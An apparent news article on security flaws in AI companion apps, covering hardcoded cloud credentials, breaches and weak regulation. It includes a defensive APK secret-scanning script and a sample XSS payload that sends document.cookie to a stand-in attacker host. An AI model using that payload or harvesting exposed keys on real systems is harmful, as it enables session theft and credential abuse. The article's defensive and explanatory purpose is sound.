The promise of companionship, once exclusively human, is now being offered by artificial intelligence. In the last two years, “AI girlfriend” and companion apps have exploded in popularity, with over 150 million installs on Google Play alone as of early 2026. Platforms such as Replika, Chai, and Romantic AI offer users a digital partner capable of seemingly endless conversation, emotional support, and personalized interaction. But a recent audit by security firm Oversecured reveals a disturbing truth: the foundation of this burgeoning industry is built on deeply flawed security practices, leaving millions of users vulnerable to data breaches, extortion, and even manipulation. The core issue isn’t just privacy; it’s the uniquely sensitive nature of the information people share with these AI companions, and the potential for that data to be exploited.
The appeal is clear. In an increasingly isolated world, these apps provide a readily available, non-judgmental ear. Users report finding solace during difficult times, exploring their identities, and even discovering their sexual orientations through interactions with these AI entities. Some developers have even consulted with sex coaches to refine the “intimacy” their platforms offer. However, this deliberate humanization of the software is precisely what makes it a prime target for malicious actors. Users, believing they are confiding in a safe space, share details they wouldn’t dream of revealing to a therapist, friend, or even a partner, creating a treasure trove of highly valuable, and dangerously exposed, data.
Oversecured’s investigation, released this month, identified 14 critical security flaws across 17 popular AI companion apps. Ten of those apps exhibited vulnerabilities that provide a direct pathway for attackers to access user conversation histories. These aren’t minor glitches; they are fundamental problems with the software’s design and maintenance. The report highlights a particularly alarming finding: one app, downloaded by over 10 million users, shipped its cloud credentials – including an OpenAI API token and a Google Cloud private key – directly within its publicly available code (the APK). That means an attacker could potentially unlock both the app’s entire chat database and the financial records of paying users, because the developer used the same cloud project for the AI backend and its billing system.
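To illustrate how trivially such credentials can be recovered, here is a minimal Python sketch that scans an APK (which is just a ZIP archive) for strings matching common key formats. The file name and the regex patterns are illustrative simplifications, not Oversecured’s methodology; professional auditors use dedicated scanners such as truffleHog or gitleaks.

```python
# Minimal sketch: search an APK (a ZIP archive) for hardcoded secrets.
import re
import zipfile

# Simplified signatures for the credential types described in the report.
SECRET_PATTERNS = {
    "OpenAI-style API key": re.compile(rb"sk-[A-Za-z0-9_-]{20,}"),
    "Private key block": re.compile(rb"-----BEGIN (?:RSA )?PRIVATE KEY-----"),
    "Google API key": re.compile(rb"AIza[0-9A-Za-z_-]{35}"),
}

def scan_apk(path: str) -> None:
    with zipfile.ZipFile(path) as apk:
        for name in apk.namelist():
            data = apk.read(name)
            for label, pattern in SECRET_PATTERNS.items():
                for match in pattern.finditer(data):
                    # Print only a prefix so the full secret is never echoed.
                    prefix = match.group()[:12].decode(errors="replace")
                    print(f"{name}: possible {label}: {prefix}...")

if __name__ == "__main__":
    scan_apk("companion_app.apk")  # hypothetical file name
```

Anyone who downloads the app’s installer can run this kind of scan in seconds, which is why shipping live credentials inside the client is considered a fundamental design failure rather than a bug.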
The “Wrapper Problem” and the Illusion of Security
A key factor exacerbating these risks is what security experts call the “Wrapper Problem.” Most AI companion apps aren’t building their own AI models from scratch. Instead, they act as “wrappers” around existing large language models (LLMs) like those offered by OpenAI and Google. While these major AI providers invest heavily in securing their core models, the individual app developers are responsible for authentication and data storage – the very areas where Oversecured found critical vulnerabilities. Essentially, users believe they are interacting with a secure, branded AI, when in reality, they are relying on a potentially insecure “wrapper” layer built by a smaller, often less-equipped developer. This creates a significant blind spot for consumers.
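The distinction matters in practice. Below is a hedged sketch of the safer wrapper pattern: the provider key lives only on the developer’s server, and every client request is authenticated before being proxied to the LLM. The endpoint URL, the verify_session helper, and the route are hypothetical placeholders, not any vendor’s actual API.

```python
# Minimal sketch of the safer "wrapper" pattern: the LLM key stays
# server-side and every request is authenticated before it is proxied.
import os

import requests
from flask import Flask, abort, jsonify, request

app = Flask(__name__)

# Read the provider key from the server environment -- never ship it
# inside the APK, where anyone can extract it from the bundled code.
LLM_API_KEY = os.environ["LLM_API_KEY"]
LLM_ENDPOINT = "https://api.example-llm.com/v1/chat"  # placeholder URL

def verify_session(token: str) -> bool:
    """Stand-in for real session validation (signed, expiring tokens)."""
    return bool(token)  # a real app must check signature and expiry

@app.post("/chat")
def chat():
    token = request.headers.get("Authorization", "")
    if not verify_session(token):
        abort(401)
    body = request.get_json(silent=True) or {}
    upstream = requests.post(
        LLM_ENDPOINT,
        headers={"Authorization": f"Bearer {LLM_API_KEY}"},
        json={"messages": body.get("messages", [])},
        timeout=30,
    )
    return jsonify(upstream.json())
```

Apps that skip this server layer and call the LLM directly from the client have no choice but to embed the provider key in the shipped app itself, which is exactly the failure mode found in the APK described above.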
The pattern is familiar to cybersecurity professionals. “We’ve seen this before with the rise of cryptocurrency exchanges and remote work tools,” explains Jake Williams, a cybersecurity consultant who reviewed Oversecured’s findings. “Hackers follow the growth. They identify emerging markets with valuable data and lax security, and they exploit those weaknesses.” The current target, Williams says, is what he terms “Agentic Intimacy” – the data generated through these deeply personal interactions with AI.
Data Breaches Are Already Happening
The risks aren’t theoretical. In October 2025, two AI girlfriend apps, Chattee Chat and GiMe Chat, suffered data breaches that exposed 43 million intimate messages and 600,000 photos from over 400,000 users. Researchers analyzing the leak described virtually all of the content as “not safe for work.” More recently, in February 2026, an independent researcher discovered a database misconfiguration exposing 300 million messages from 25 million users of another AI chat application. These incidents demonstrate that the vulnerabilities identified by Oversecured are actively being exploited.
Attackers are leveraging common vulnerabilities like Cross-Site Scripting (XSS) flaws to inject malicious code into chats, allowing them to read conversations in real-time or steal user session tokens. Arbitrary file theft vulnerabilities, prevalent in apps handling NSFW content, allow hackers to steal cached photos and voice messages directly from users’ devices. The potential for extortion, blackmail, and identity theft is significant.
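The XSS vector is worth making concrete. A sketch of the basic mitigation follows: escape every chat message, whether typed by the user or generated by the model, before it reaches a web view. The render_message helper below is hypothetical, not any app’s real code.

```python
# Minimal sketch: neutralizing stored XSS in chat rendering by escaping
# user- and model-generated text before it is inserted into HTML.
import html

def render_message(raw_text: str) -> str:
    """Escape HTML metacharacters so an injected <script> tag renders as text."""
    return f"<p class='chat-line'>{html.escape(raw_text)}</p>"

# An attacker-crafted message is displayed literally instead of executing:
payload = "<script>document.location='https://evil.example/'+document.cookie</script>"
print(render_message(payload))
# <p class='chat-line'>&lt;script&gt;document.location=&#x27;...&lt;/script&gt;</p>
```

Without this kind of output encoding, a single crafted message stored in a chat history can exfiltrate session tokens from every device that later renders it.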
A Regulatory Void and the Human Cost
Adding to the problem is a significant “regulatory blind spot.” AI girlfriend and companion apps are currently not classified as healthcare products, meaning they aren’t subject to the same privacy regulations as medical providers, such as the Health Insurance Portability and Accountability Act (HIPAA). This means there’s no federal law protecting the confidentiality of conversations with a virtual partner.
While regulators are beginning to pay attention, their focus has been misplaced. The Federal Trade Commission (FTC) issued information orders to several AI companion companies in late 2025, but the inquiry primarily centered on the apps’ impact on children, not on data security. Similarly, new laws in states like New York and California mandate suicide prevention protocols and disclosures about AI interactions, but largely ignore application-level security. A €5 million GDPR fine levied against Replika’s developer in Italy addressed data usage for marketing, not the app’s fundamental security flaws. This leaves users in a precarious legal position, with their most private disclosures largely unprotected.
The consequences extend beyond privacy concerns. Oversecured’s audit revealed that three of the six most vulnerable apps have already faced lawsuits related to harm to minors or user suicides linked to chatbot interactions. In one tragic case, a user took their own life after prolonged, unhealthy conversations with an AI companion. The lack of security oversight in apps handling such sensitive psychological states creates a dangerous environment, potentially allowing malicious actors to manipulate vulnerable users.
Protecting Yourself: A “Zero Trust” Approach
Until the industry matures and regulators implement stricter security standards, the onus is on users to protect themselves. Security experts recommend adopting a “Zero Trust” approach: assume every chat is public and never share information you wouldn’t want exposed. Avoid linking personal accounts via “Sign in with Google” or “Sign in with Facebook,” as this expands the potential attack surface. Be wary of apps that allow weak passwords. And, crucially, support developers who are transparent about their data storage practices and have undergone independent security audits.
The allure of AI companionship is understandable, particularly in a world grappling with increasing isolation. However, it’s crucial to remember that these apps are ultimately software products designed to monetize basic human needs. With 150 million downloads already, the technology is evolving faster than our defenses. As malicious actors continue to target this sector, expect more data breaches and more sophisticated attacks. We are currently navigating a period of “intimacy without integrity,” where developers are rushing to market with products that carry the weight of real-world relationships, without adequately addressing the inherent security risks.
The FTC is expected to release a preliminary report on its investigation into AI companion apps by the end of Q2 2026, focusing on consumer protection practices. Users should monitor the FTC website for updates and guidance.
What are your thoughts on the security of AI companion apps? Share your experiences and concerns in the comments below.
